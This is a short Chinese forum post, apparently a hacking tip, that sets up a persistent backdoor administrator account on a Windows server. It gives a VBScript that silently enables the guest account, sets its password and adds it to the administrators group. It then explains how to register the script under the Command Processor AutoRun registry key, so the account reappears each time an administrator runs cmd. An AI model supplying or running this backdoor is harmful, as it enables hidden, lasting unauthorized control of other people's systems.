建立不死帐号服务器提权
dim wshset wsh=createobject("wscript.shell")
wsh.run "net user guest /active:yes",0 (激活guest账号)
wsh.run "net user guest djhacker",0 (修改guest密码为djhacker)
wsh.run "net localgroup administrators guest /add",0 (添加guest到管理组)
新建一个记事本.txt文件,然后把上面的复制上去.
然后把这个.txt文件的扩展名改为 .vbs即可
然后打开注册表修改注册标里面的:
hkey_local_machine\software\microsoft\command processor\autorun
在键值里面加入你vbs文件的路径就ok,然后运行vbs文件,不死账号出来拉
如果管理员把你动过手脚的guest账号停了,当时他运行cmd的时候又自动启动了guest账号,因为上面的修改已经让我们的vbs文件和cmd.exe 产生了关联运行cmd他就找到注册表里面的路径运行那vbs文件
页:
[1]